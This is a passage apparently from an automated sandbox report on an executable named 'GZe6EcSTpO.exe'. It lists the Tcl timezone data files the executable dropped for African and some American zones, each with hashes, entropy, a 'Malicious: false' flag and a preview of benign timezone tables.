Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	137
Entropy (8bit):	4.901323714732514
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DchFkXGm2OHMXFx5vXQtd:SlSWB9X52DaJm2OHMXr5Pk
MD5:	482A9C32317231A2781462E027FBAFB1
SHA1:	01C6E48EFA6E24441D4BF747E23F4AF7A9FE93B7
SHA-256:	514CD879C63BC4BB05E8BF257D844D8A0D805CA24C2625B90D5B675D3596A31B
SHA-512:	C0FCB4DA4782976D3684B852DBF815B03434277FA60CAE975B38B919A847CBD76997D6EAC993AE94E0075D66B19E1FB84CAAA3FF34C95F6FCF481C31FC7A6372
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Lome) {. {-9223372036854775808 292 0 LMT}. {-2429827492 0 0 GMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Luanda Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	172
Entropy (8bit):	4.9389047305496945
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DccLteEXGm2OHMFnvXfFFTBdxGFFid9cHsrXYvCn:SlSWB9X52Dmm2OHEnPN1BzGyciXLn
MD5:	E9982C54781BE8BE72A0BB3008B3F268
SHA1:	42A964BD048277FD2EAF686414E92CE61223FE33
SHA-256:	91A28C617BC2FC37AFCCEA2F61F6F80211BD9DEACC90527EE2ADA48DD9C4048F
SHA-512:	CF4CA7A9145474FF8A7391795F75A0AA78B292E7ED206ADFC3F4EA865D3FB3607C1A800C1EC3780BAB2A5C612042968298530120AF6EA0E0609210162613BE76
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Luanda) {. {-9223372036854775808 3176 0 LMT}. {-2461452776 3124 0 AOT}. {-1849395124 3600 0 WAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Lubumbashi Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	147
Entropy (8bit):	5.002740056079649
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcfpTLXGm2OHca5vXGaBMiv:SlSWB9X52D8pTCm2OHca5PGpM
MD5:	B038D01BEC816AE3BD3ED0AFC1B9FF67
SHA1:	3AB22DA28A747CCB285B989729C845C7E1479F26
SHA-256:	2154AB5CC5822536824C926743359A239074C3601BB705E97ED2CFDDF8F6C1DA
SHA-512:	ED1BDFEACAFD613B9983F26BEF24EE194C81E90A8A00A585F449FC002FB6F80F451BB72F07C3103F3E1F122865A14BEB01F6D670DDAC0EFA890EBFDC3D731E2B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Lubumbashi) {. {-9223372036854775808 6592 0 LMT}. {-2276646592 7200 0 CAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Lusaka Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	143
Entropy (8bit):	4.936993889586502
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcOIcXGm2OHenFGxYvXdOcdyXVVkiv:SlSWB9X52D2Tm2OHeFGxYPs7kM
MD5:	DB698834118D1D0A1BC265E9F48B4B23
SHA1:	215D63D9E0EA7CCC2F59802EDDE9E5A5792FAF8A
SHA-256:	FAC07E348D39E39FE4E3E0E99247190D48EAED0F4620BE98C41F6B4369CC1252
SHA-512:	B40D0D9E4DF1DB6B1944CF044A3A7B1479463C48B22508EB15A1A6E1182306C306D4B6D325A652B8897F5AEC8F5C10F9CD79580B3F6CFCF83F118B05D3B98316
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Lusaka) {. {-9223372036854775808 6788 0 LMT}. {-2109289988 7200 0 CAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Malabo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	168
Entropy (8bit):	4.8384184690820575
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcoSXGm2OHEVPmYvUdSaQF7lc3QSivZYvCn:SlSWB9X52DzJm2OHEVPmYVaQFqgSyLn
MD5:	240DDA6FCFCC3541922191C40B371815
SHA1:	EE89CA61F05ADDB25D343388CD3D78FC67BCB9F5
SHA-256:	C9245A4AD55ED4D052F2BCFF01A2E851AE68D5C1BE5403F484CEFECFEFE4ADDB
SHA-512:	77708E6DB344DA9F83F459D13C697D64B7902A8B0CC1A95902B49C0E71E3AB5074C7755ED1F3D0AEFFD49D44D7DBEDA9CED60C122F19691B5B6054C75CCBC129
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Malabo) {. {-9223372036854775808 2108 0 LMT}. {-1830386108 0 0 GMT}. {-190857600 3600 0 WAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Maputo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	143
Entropy (8bit):	4.906945970372021
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcfKUXGm2OHoVvXdSF2iv:SlSWB9X52DESm2OHoVPdM
MD5:	5497C01E507E7C392944946FCD984852
SHA1:	4C3FD215E931CE36FF095DD9D23165340D6EECFE
SHA-256:	C87A6E7B3B84CFFA4856C4B6C37C5C8BA5BBB339BDDCD9D2FD34CF17E5553F5D
SHA-512:	83A2AA0ED1EB22056FFD3A847FB63DD09302DA213FE3AB660C41229795012035B5EA64A3236D3871285A8E271458C2DA6FCD599E5747F2F842E742C11222671A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Maputo) {. {-9223372036854775808 7820 0 LMT}. {-2109291020 7200 0 CAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Maseru Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	203
Entropy (8bit):	4.756948309135006
Encrypted:	false
SSDEEP:	6:SlSWB9X52DZQbm2OHtPsd/Z06VcF206KsF:MBp52DZQmdHtP8hJVcFEKsF
MD5:	EA039E379E21F4AA5B6708EA7FB79266
SHA1:	2BDBF8FAEB7E8831B7B1BD7F4BAFFD5F06139568
SHA-256:	1204BB8517F65D25B8C7C45573D132EDA71B6E3924A4B4D1EE6015FDC84492F7
SHA-512:	77A0A4DBFD69EC77C584E493CA4DB95CB79C24C339B2557E869B5C7845F43AF0772385C1E593DE645622A9ED2BD60A64E66F681C941355580C88E878788AEE2D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Maseru) {. {-9223372036854775808 6600 0 LMT}. {-2109289800 7200 0 SAST}. {-829526400 10800 1 SAST}. {-813805200 7200 0 SAST}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Mbabane Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	145
Entropy (8bit):	4.963775255719758
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcWE0Ew/kXGm2OHUFvvXdKTjkVvu5L:SlSWB9X52DzjEEm2OHUVPiksF
MD5:	687D08D2AB3C9E411EBD3EA24C88DDCE
SHA1:	695CF95C32AD57BE7D91D8DB77AF1B51E6E285CF
SHA-256:	BABB7BD790BD6333D371B48D80553C379ED563A18034677675BB54FF1653A585
SHA-512:	8EE121392C15C59057982905656E60A02ABE3F95EA9B479EE40AEBB31CED1679FB5AC408BA9733D08D66ED941D2D10F34CC9BA31F1EAF81B1124744FD878D09B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Mbabane) {. {-9223372036854775808 7464 0 LMT}. {-2109290664 7200 0 SAST}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Mogadishu Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	207
Entropy (8bit):	4.795551110316884
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcBEBXCEtXGm2OHsRoxYvXWLcHIsXSh3mH/heHpMGTW3lv:SlSWB9X52DFSbm2OHsOxYPMPRmCRTWl
MD5:	9A1A48A187D0ACC3278D24C248A5F2C5
SHA1:	2348F685DBEF5A331CEA34729C27700BE114B748
SHA-256:	A433DD1167FE4023BD4DBBE411B4FBF807E67612A85E3D869F512FB426D40859
SHA-512:	BD52931F72F1BE437581ABCE2FEE9F8FD59DB5F5C9DCB196349986C2F272ACF09E95570066577007C193303FC53D15DC0D552EFBF6BC31217C2575F40FA7B752
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Mogadishu) {. {-9223372036854775808 10888 0 LMT}. {-2403572488 10800 0 EAT}. {-1230778800 9000 0 BEAT}. {-410236200 10800 0 EAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Monrovia Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	200
Entropy (8bit):	4.837701760806169
Encrypted:	false
SSDEEP:	6:SlSWB9X52D3NwTm2OHrFGxYPlHIgafTag/KVK:MBp52D3NwTmdHhmYPdIgah/OK
MD5:	47AD43D6A60EFF7A8D34482906618B4C
SHA1:	9A56DA8F158B8FC91D8AE04B438C7CA157545F63
SHA-256:	90DB2B6966B1215251E77D80B57C2192B5F88B6D3A14E444117FE1B438214406
SHA-512:	D8AE3CF5487551F388486322E4979731A992939C2F974E543EB692604BF9E08083DDD3A9243BA0C01975683FF9EA255E9BAE0F65F7918547B42AA6AEABA581C6
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Monrovia) {. {-9223372036854775808 -2588 0 LMT}. {-2776979812 -2588 0 MMT}. {-1604359012 -2670 0 LRT}. {73529070 0 0 GMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Nairobi Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	234
Entropy (8bit):	4.762681539526016
Encrypted:	false
SSDEEP:	6:SlSWB9X52DkWJm2OHsvT5X26V/7VVdekzQ4U/w:MBp52DdJmdHsvVXHVVxQ4U/w
MD5:	616A624AF7C0613DA8682B1371A601EB
SHA1:	B9E9E7DDEDEC09886D8B5EFB0DD03A9F31E55936
SHA-256:	17F2B9541A61E87D6C2924A91AB77F3D08F71DEDD6E3C9AC83892BF68C50A81B
SHA-512:	A7AC4975C147D2B25BDF4C2FBF0F98967E72EC4165BEACE802012590D871B71659F6C1CF297BAEB41CE59190001AEFB17CDA69881D4678333EC74E3C808AD5E9
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Nairobi) {. {-9223372036854775808 8836 0 LMT}. {-1309746436 10800 0 EAT}. {-1262314800 9000 0 BEAT}. {-946780200 9900 0 BEAUT}. {-315629100 10800 0 EAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Ndjamena Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	200
Entropy (8bit):	4.8064239600480985
Encrypted:	false
SSDEEP:	6:SlSWB9X52DjXm2OHNseVaxCXGFaS1HkFWTvLn:MBp52DjXmdHPVX8aS2yzn
MD5:	459DA3ECBE5C32019D1130DDEAB10BAA
SHA1:	DD1F6653A7B7B091A57EC59E271197CEC1892594
SHA-256:	F36F8581755E1B40084442C43C60CC904C908285C4D719708F2CF1EADB778E2E
SHA-512:	FF74D540157DE358E657E968C9C040B8FE5C806D22782D878575BFAC68779303E6071DC84D6773BC06D299AC971B0EB6B38CA50439161574B5A50FF6F1704046
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Ndjamena) {. {-9223372036854775808 3612 0 LMT}. {-1830387612 3600 0 WAT}. {308703600 7200 1 WAST}. {321314400 3600 0 WAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Niamey Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	197
Entropy (8bit):	4.807371561981492
Encrypted:	false
SSDEEP:	6:SlSWB9X52Dsh2wJm2OHYmYVaqrZVXGfxVCQYLn:MBp52DbEmdHYmYVhfYIQsn
MD5:	39CA761FD90A965D67C3DA2191F2D162
SHA1:	A6556E35DBEA29B27862EFD3163D390C2595FB20
SHA-256:	8BF06FBDB8A672A01758C2C1514E76F0A50C0AE9387B9F1AA2C046A5FFBF1989
SHA-512:	61CB1554EE81715523E281DD44965F640A2647286D145BD4DE46B7CF3411231C72C5BF78AB9B9216195B735E3DE937AD17F882BC6412127CF55278B45B6CBAF1
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Niamey) {. {-9223372036854775808 508 0 LMT}. {-1830384508 -3600 0 WAT}. {-1131231600 0 0 GMT}. {-315619200 3600 0 WAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Nouakchott Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	200
Entropy (8bit):	4.81486584199261
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcboG0cXGm2OHZHxsYvUdSanVFlUT3VQWTvYvFZ6W3td:SlSWB9X52DqbAm2OHZH+YVanVwVvGZ9n
MD5:	94CFB66CECF511BA9122E5B1D341F066
SHA1:	6403F72FEDF54770D603043BD8843C981F50A91A
SHA-256:	FC8DF2E0F128F0C18CB3AD18C0B5922D0DA48F0C7775E64418218F4C40DCF2FB
SHA-512:	DAB7508F90B8307D8BA8C1FD5AB6DDC1B79313833019A5858B49C9BF3A8A32E9B22C1F7E50B47F48DB5BE9136C05B2CDA3B8A274AE3F08DD6818FE2A697D80C4
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Nouakchott) {. {-9223372036854775808 -3828 0 LMT}. {-1830380172 0 0 GMT}. {-1131235200 -3600 0 WAT}. {-286930800 0 0 GMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Ouagadougou Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	145
Entropy (8bit):	4.993875448661831
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcXCoXGm2OHxFVT5vUdSaPbgod:SlSWB9X52D7m2OHxFVVVaPcw
MD5:	BBB0A077B28482DA5DAC5AD27F92D212
SHA1:	B6C0C25EE7BD6AD793DDB7DB3A395B9CAFC5F9C6
SHA-256:	D106E4E873DB8079A300B7E4E2F01EE3A14C9C6DB8A25E2DB16C61E6CE245FAF
SHA-512:	D2CD780778D4A4DC69786DB6F2E22632BF79619B0D45F38998C98FD4FD2D3E58919BCF5241615130A18BA71B95A78A521A5001240B8B0724445B8075FE2C2454
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Ouagadougou) {. {-9223372036854775808 -364 0 LMT}. {-1830383636 0 0 GMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Porto-Novo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	172
Entropy (8bit):	4.902262882407269
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcyTKMLXGm2OHbeYvUdSadblUT3VOTNZYvCn:SlSWB9X52DWm2OHSYVaoOvLn
MD5:	C8236D27BC1D6C1D82FCEB0776E53D10
SHA1:	9E408B9FC2687887B3B55ED754DA35668F23F30C
SHA-256:	FA547FADF46CBC7441461D46384DF14B0E846BC1D4775B866CACAB33B227B9F1
SHA-512:	75C2C0FD46A85C3AEC045B6AF50901C776C5984CBA0E6915F613B7BE3E1950AF063A54568B147721E678ED864BC0E18E080595540BB48E55B524F7C21608F28F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Porto-Novo) {. {-9223372036854775808 628 0 LMT}. {-1830384628 0 0 GMT}. {-1131235200 3600 0 WAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Sao_Tome Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	172
Entropy (8bit):	4.9078452305189515
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcOFwFkXGm2OHzT5vXbe1VnvUdSaMvtd:SlSWB9X52DIJm2OHH5PGNVa8X
MD5:	2D3510E2118BE78B266624BE90287D2B
SHA1:	D196E42D4CECB4B982C7189F67ABED958C48F5AA
SHA-256:	7BF0AB09D0936E1FA8F5A97544C92E7861DC111B4CE01D707501B6ED8C7EDDF2
SHA-512:	6EE2B07A472D676CF749461D179DCE02B832195639859A29E5176ACF4ACA00C7622A2F2506326A66D215180E5E15A930B5C7E272728CFBC5F01C534D95B6D7DD
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Sao_Tome) {. {-9223372036854775808 1616 0 LMT}. {-2713912016 -2192 0 LMT}. {-1830381808 0 0 GMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Timbuktu Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	178
Entropy (8bit):	4.852118719558368
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqsxxowVAIgNGEV4F2DcHdDcxmn:SlSWB9IZaM3y7xawVAIgNTV4F2DwdDwm
MD5:	77C41E72B615D6D304523D34B4426AD3
SHA1:	A5C5E73496A7F2A2C554E32B72C646FD29E19BC6
SHA-256:	46028CA2C897365227736B6DEAC7186DD7609914D3143B2E58559A2616235E9C
SHA-512:	249F24B3FED160A1DF6B1DDD41FD4BE4CF75F39113B4CDD63681FF61B3390F9468142BA8B0AE49DD5A86B25925DE17C51EA08BD2BC288F6A4A622693EC9D3752
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Bamako)]} {. LoadTimeZoneFile Africa/Bamako.}.set TZData(:Africa/Timbuktu) $TZData(:Africa/Bamako).

C:\Users\user\Desktop\tcl\tzdata\Africa\Tripoli Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5822
Entropy (8bit):	3.7505423379992147
Encrypted:	false
SSDEEP:	96:tFNCdLwvFZRMoUQoBTOe8+JUWEkSAI38kRCT+87tFIW5IIP7GaXbb:DRMoUQoBfC4f
MD5:	9C0BC05A9FD4405AFC3CDB7E32B6A015
SHA1:	F2565C23FDC96C947A70F2E389E640423B7466C4
SHA-256:	4A972852F65E4CD07747AABE67B9A56001AD405E4F96A25F5E827B3D38F31AE9
SHA-512:	0B2864A599437D1B860E82F78349F7781AD53E9FF7A7C1DD938B1BDDB08D6E79FA97546403A23A20E3F74C2AC637E8EAF6A5FDE9F45D274D188D12E7252949D4
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Tripoli) {. {-9223372036854775808 3164 0 LMT}. {-1577926364 3600 0 CET}. {-574902000 7200 1 CEST}. {-512175600 7200 1 CEST}. {-449888400 7200 1 CEST}. {-347158800 7200 0 EET}. {378684000 3600 0 CET}. {386463600 7200 1 CEST}. {402271200 3600 0 CET}. {417999600 7200 1 CEST}. {433807200 3600 0 CET}. {449622000 7200 1 CEST}. {465429600 3600 0 CET}. {481590000 7200 1 CEST}. {496965600 3600 0 CET}. {512953200 7200 1 CEST}. {528674400 3600 0 CET}. {544230000 7200 1 CEST}. {560037600 3600 0 CET}. {575852400 7200 1 CEST}. {591660000 3600 0 CET}. {607388400 7200 1 CEST}. {623196000 3600 0 CET}. {641775600 7200 0 EET}. {844034400 3600 0 CET}. {860108400 7200 1 CEST}. {875919600 7200 0 EET}. {1352505600 3600 0 CET}. {1364515200 7200 1 CEST}. {1382659200 3600 0 CET}. {1395964800 7200 1 CEST}. {1414713600 3600 0 CET}. {1427414400 7200 1 CE

C:\Users\user\Desktop\tcl\tzdata\Africa\Tunis Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1072
Entropy (8bit):	4.074604685883076
Encrypted:	false
SSDEEP:	12:MBp52DgmdHjPbwSRjneMVyDKCNFWLFyBXS9/3S3K/CBmvyncSuZSqLS2C6oPwVFD:cQUejbwSRyS2Uyc+FcJLKgzmcx9b
MD5:	1899EDCB30CDDE3A13FB87C026CD5D87
SHA1:	4C7E25A36E0A62F3678BCD720FCB8911547BAC8D
SHA-256:	F0E01AA40BB39FE64A2EB2372E0E053D59AA65D64496792147FEFBAB476C4EC3
SHA-512:	FD22A2A7F9F8B66396152E27872CCBA6DA967F279BAF21BC91EF76E86B59505B3C21D198032B853427D9FFAB394FBB570F849B257D6F6821916C9AB29E7C37A1
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Tunis) {. {-9223372036854775808 2444 0 LMT}. {-2797202444 561 0 PMT}. {-1855958961 3600 0 CET}. {-969242400 7200 1 CEST}. {-950493600 3600 0 CET}. {-941940000 7200 1 CEST}. {-891136800 3600 0 CET}. {-877827600 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-842918400 3600 0 CET}. {-842223600 7200 1 CEST}. {-828230400 3600 0 CET}. {-812502000 7200 1 CEST}. {-796269600 3600 0 CET}. {-781052400 7200 1 CEST}. {-766634400 3600 0 CET}. {231202800 7200 1 CEST}. {243903600 3600 0 CET}. {262825200 7200 1 CEST}. {276044400 3600 0 CET}. {581122800 7200 1 CEST}. {591145200 3600 0 CET}. {606870000 7200 1 CEST}. {622594800 3600 0 CET}. {641516400 7200 1 CEST}. {654649200 3600 0 CET}. {1114902000 7200 1 CEST}. {1128038400 3600 0 CET}. {1143334800 7200 1 CEST}. {1162083600 3600 0 CET}. {1174784400 7200 1 CEST}. {1193533200

C:\Users\user\Desktop\tcl\tzdata\Africa\Windhoek Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6288
Entropy (8bit):	3.7400827352074417
Encrypted:	false
SSDEEP:	96:Qsj67E2442ZG5tD58bEpEnvR0NnrVycST8a6l+2BTkXj0ErPVAic0jQRJo5v:Qsj6v2Z+qbEpEn+fBvkpGYv
MD5:	44AC624997617774CDF0E2E63D923771
SHA1:	C2D2EF5A46A73F5BDD33F1E37A3D9867CB9FCAC1
SHA-256:	ED790E4D5DE1588489108DAE81FCACB2F93913026334614E651FD9EBD1923206
SHA-512:	62D6E7C8F2C310B2CD7C7E957C10BE8FECE341EEC27E2B4896827C0709DB29B3DC33D2CF748001B06F764F5C7FCC639C603FA3ADC119074F54F8A2B5EB1D0C8F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Windhoek) {. {-9223372036854775808 4104 0 LMT}. {-2458170504 5400 0 SWAT}. {-2109288600 7200 0 SAST}. {-860976000 10800 1 SAST}. {-845254800 7200 0 SAST}. {637970400 7200 0 CAT}. {765324000 3600 0 WAT}. {778640400 7200 1 WAST}. {796780800 3600 0 WAT}. {810090000 7200 1 WAST}. {828835200 3600 0 WAT}. {841539600 7200 1 WAST}. {860284800 3600 0 WAT}. {873594000 7200 1 WAST}. {891734400 3600 0 WAT}. {905043600 7200 1 WAST}. {923184000 3600 0 WAT}. {936493200 7200 1 WAST}. {954633600 3600 0 WAT}. {967942800 7200 1 WAST}. {986083200 3600 0 WAT}. {999392400 7200 1 WAST}. {1018137600 3600 0 WAT}. {1030842000 7200 1 WAST}. {1049587200 3600 0 WAT}. {1062896400 7200 1 WAST}. {1081036800 3600 0 WAT}. {1094346000 7200 1 WAST}. {1112486400 3600 0 WAT}. {1125795600 7200 1 WAST}. {1143936000 3600 0 WAT}. {1157245200 7200 1 WAST}. {1175385600

C:\Users\user\Desktop\tcl\tzdata\America\Adak Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8404
Entropy (8bit):	3.859401130903035
Encrypted:	false
SSDEEP:	96:sGWQm82WEXKfYoba+HbVBoqwXjvfolmgmkHvQZTk:sGWQmGa+HbVBoqSvfczms
MD5:	53B6CE72FB8A751B3BC932B368CB2511
SHA1:	4161D34F0AC339A31A32DD003CB9D0C289F25132
SHA-256:	64A9B46ADDA15DA226C1368CFC0663AE28251A31E25D1B7F148A8BC662B216CC
SHA-512:	2553814D6D0C096BB5F51DEC94A54CEC99A65A969BC4F963F0C8EE89F3B95244B84BC7CADA251BF2724204EF70B5E86FB56E0032492CCC6330B45A433CAEBDD9
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Adak) {. {-9223372036854775808 44001 0 LMT}. {-3225356001 -42398 0 LMT}. {-2188944802 -39600 0 NST}. {-883573200 -39600 0 NST}. {-880196400 -36000 1 NWT}. {-769395600 -36000 1 NPT}. {-765374400 -39600 0 NST}. {-757342800 -39600 0 NST}. {-86878800 -39600 0 BST}. {-31496400 -39600 0 BST}. {-21466800 -36000 1 BDT}. {-5745600 -39600 0 BST}. {9982800 -36000 1 BDT}. {25704000 -39600 0 BST}. {41432400 -36000 1 BDT}. {57758400 -39600 0 BST}. {73486800 -36000 1 BDT}. {89208000 -39600 0 BST}. {104936400 -36000 1 BDT}. {120657600 -39600 0 BST}. {126709200 -36000 1 BDT}. {152107200 -39600 0 BST}. {162392400 -36000 1 BDT}. {183556800 -39600 0 BST}. {199285200 -36000 1 BDT}. {215611200 -39600 0 BST}. {230734800 -36000 1 BDT}. {247060800 -39600 0 BST}. {262789200 -36000 1 BDT}. {278510400 -39600 0 BST}. {294238800 -36000 1 BDT}. {309960000 -3

C:\Users\user\Desktop\tcl\tzdata\America\Anchorage Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8444
Entropy (8bit):	3.8881028022209834
Encrypted:	false
SSDEEP:	96:WERpxXw34N+YXSUKC8aaIqDPRs/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8s:WEZd6M/4h5sBPy+CMt/ElALLVuAH
MD5:	A1CD6589E2F4580D7334F1ED9E5FF7AB
SHA1:	593F87F30B8B766389E30322194C25441EFED694
SHA-256:	48792AAD13FB634F3BFE27B1C3752AE50950818DFF2D6B598E4AF449DC3B187B
SHA-512:	63F6197E738C51EFB830CB8440F93EDC27EACA035BA8A75383FD095928E8DEC05C305EB559018E8D4F5778D76E6CC4D659DF8F408DAA33574F47B8C7F344F877
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Anchorage) {. {-9223372036854775808 50424 0 LMT}. {-3225362424 -35976 0 LMT}. {-2188951224 -36000 0 CAT}. {-883576800 -36000 0 CAWT}. {-880200000 -32400 1 CAWT}. {-769395600 -32400 0 CAPT}. {-765378000 -36000 0 CAPT}. {-757346400 -36000 0 CAT}. {-86882400 -36000 0 AHST}. {-31500000 -36000 0 AHST}. {-21470400 -32400 1 AHDT}. {-5749200 -36000 0 AHST}. {9979200 -32400 1 AHDT}. {25700400 -36000 0 AHST}. {41428800 -32400 1 AHDT}. {57754800 -36000 0 AHST}. {73483200 -32400 1 AHDT}. {89204400 -36000 0 AHST}. {104932800 -32400 1 AHDT}. {120654000 -36000 0 AHST}. {126705600 -32400 1 AHDT}. {152103600 -36000 0 AHST}. {162388800 -32400 1 AHDT}. {183553200 -36000 0 AHST}. {199281600 -32400 1 AHDT}. {215607600 -36000 0 AHST}. {230731200 -32400 1 AHDT}. {247057200 -36000 0 AHST}. {262785600 -32400 1 AHDT}. {278506800 -36000 0 AHST}. {294235200

C:\Users\user\Desktop\tcl\tzdata\America\Anguilla Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	150
Entropy (8bit):	5.022817841749413
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGE/8/edSXGm2OHrWTr5vUd9JlVvwvYv:SlSWB9X5290/8YJm2OHrWTr5GVr
MD5:	400195CCBE9C119FF8E842171A021DFE
SHA1:	F182B870106965317957A19B635F6BFBA9F463DF
SHA-256:	4D59A7AA667B52D8FED39DE017A677C0DEF658F43F68B3FD82AF7F31886D886D
SHA-512:	DE14E93EAD97A908D1978944A6E9331ACC6D7E1EDFDFBE4DF9CC547D9BB5625191FBD3E9FF9D30F69601E549B1D2498FA1BA3EECFCC2F73ABD2717C21C711D38
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Anguilla) {. {-9223372036854775808 -15136 0 LMT}. {-1825098464 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Antigua Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.914323832612478
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGE//MFeEXGm2OHGFVFGevUd+RyUXVVvawch0/HRR/vwvC:SlSWB9X5290//MFeLm2OHSVke50UXVVL
MD5:	1D8C8679C62FD5B340C2C8DFFB4D8F25
SHA1:	653B9DAEE2F0D55414E29C0AEDD7E34423DB3FA8
